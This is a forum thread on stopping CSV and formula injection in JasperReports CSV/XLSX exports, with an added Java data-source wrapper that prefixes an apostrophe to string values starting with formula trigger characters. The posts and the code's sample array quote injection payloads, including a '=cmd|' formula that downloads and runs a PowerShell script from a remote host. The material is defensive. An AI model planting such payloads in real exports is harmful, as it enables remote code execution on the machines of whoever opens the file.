
Prevent CSV injection


cardel


Is it possible to set some properties or data filters to prevent CSV injection?

I am exporting data from JSON collection to report in CSV format. Penetration test found out that there can be a problem with CSV injection.

Someone can add "=cmd|' /C notepad'!'A1'" to an exported field, and this will cause Excel to open Notepad or other scripts.

Is it possible to automatically escape some special characters in fields?

I tried

    csvExporterConfiguration.setForceFieldEnclosure(true);

But with no effect. I need to escape the +, -, =, @, | characters. Can I do it somehow in JasperReports, or should I do this data modification before exporting the report?

Regards

Karel


Interested in any answers/guidance as well on this topic of formula injection in CSV and XLSX use cases.

Reference: https://pentestmag.com/formula-injection/

Is it possible to set some config/property such that the JRXlsxExporter will auto prepend a space or apostrophe in front of "=cmd***" in any textFields that are saved as such in the db tables queried by the report query?

For example, assume Person.FirstName value in db table is the following:

=cmd|'/Cpowershell Import-Module BitsTransfer; Start-BitsTransfer -source https://141.io/shell.ps; Invoke-Item shell.ps;'!z

which could be a malicious download script attempt in a formula field. Would it be possible to prevent such an attack specifically in the fillReport() intercept or similar?

This is "supposed" to solve the problem with CSV (can you provide an example? The original poster says it doesn't work):

http://jasperreports.sourceforge.net/api/net/sf/jasperreports/export/SimpleCsvExporterConfiguration.html#setForceFieldEnclosure-java.lang.Boolean-

Unfortunately, the same APIs don't exist for http://jasperreports.sourceforge.net/api/net/sf/jasperreports/export/SimpleXlsxExporterConfiguration.html

Why don't the same APIs exist for force field enclosure for XLSX?

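Both posts above ask the same thing: where in JasperReports a value such as "=cmd|..." can be neutralised before it reaches the CSV or XLSX exporter. The following is an added example, not code from the JasperReports project or from either poster. It hooks in at fill time, which is the "fillReport() intercept" the second post asks about: a wrapper around any JRDataSource that prefixes an apostrophe to every String field that starts with one of the formula trigger characters. JRDataSource, JRField, JRException, JasperFillManager and JsonDataSource are real JasperReports types; the class name FormulaSafeDataSource, the neutralize() method, the TRIGGERS list and the sample strings are this example's own.

```java
import net.sf.jasperreports.engine.JRDataSource;
import net.sf.jasperreports.engine.JRException;
import net.sf.jasperreports.engine.JRField;

/*
 * Added example, not JasperReports code. Wraps a JRDataSource so that every
 * String field value is neutralised before the filler sees it. Because the
 * CSV and XLSX exporters both read the filled JasperPrint, one wrapper covers
 * both output formats without any exporter-specific configuration.
 */
public final class FormulaSafeDataSource implements JRDataSource {

    /*
     * Characters that make Excel/LibreOffice evaluate a cell as a formula when
     * they start the cell: = + - @ plus tab and carriage return (the OWASP CSV
     * injection list). '|' is only dangerous inside a formula, so neutralising
     * the leading trigger also defuses the "=cmd|' /C ...'!A1" payloads quoted
     * in this thread.
     */
    private static final String TRIGGERS = "=+-@\t\r";

    private final JRDataSource delegate;

    public FormulaSafeDataSource(JRDataSource delegate) {
        this.delegate = delegate;
    }

    @Override
    public boolean next() throws JRException {
        return delegate.next();
    }

    @Override
    public Object getFieldValue(JRField field) throws JRException {
        Object value = delegate.getFieldValue(field);
        // Only text can carry a formula; numbers, dates, etc. pass through unchanged.
        return value instanceof String ? neutralize((String) value) : value;
    }

    /**
     * Returns the value unchanged unless its first non-space character is a
     * formula trigger, in which case a leading apostrophe is added. Excel
     * treats a cell starting with an apostrophe as literal text and hides the
     * apostrophe itself.
     */
    static String neutralize(String value) {
        if (value == null || value.isEmpty()) {
            return value;
        }
        // Defensive assumption: skip leading spaces before checking, so a value
        // like " =1+1" is treated as a trigger whether or not the consumer trims it.
        int i = 0;
        while (i < value.length() && value.charAt(i) == ' ') {
            i++;
        }
        if (i < value.length() && TRIGGERS.indexOf(value.charAt(i)) >= 0) {
            return "'" + value;
        }
        return value;
    }

    // Stand-alone check on the two payloads quoted in the thread (constructed input).
    public static void main(String[] args) {
        String[] samples = {
            "=cmd|' /C notepad'!'A1'",
            "=cmd|'/Cpowershell Import-Module BitsTransfer; Start-BitsTransfer -source https://141.io/shell.ps; Invoke-Item shell.ps;'!z",
            "+1 555 0100",
            "@home",
            "Karel"
        };
        for (String s : samples) {
            System.out.println(neutralize(s));
        }
    }
}
```

Usage at fill time, assuming the JSON collection is already available as an InputStream: `JasperFillManager.fillReport(jasperReport, parameters, new FormulaSafeDataSource(new JsonDataSource(jsonStream)))`. Two caveats worth knowing before relying on setForceFieldEnclosure alone: CSV quoting only tells the parser where a field ends, and Excel strips the quotes on import and then still evaluates the field content as a formula, so enclosure by itself does not stop the attack; and the apostrophe prefix is only invisible in Excel, other CSV consumers will show it, so a report that feeds non-spreadsheet systems may want a different prefix or a different export path for that audience.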
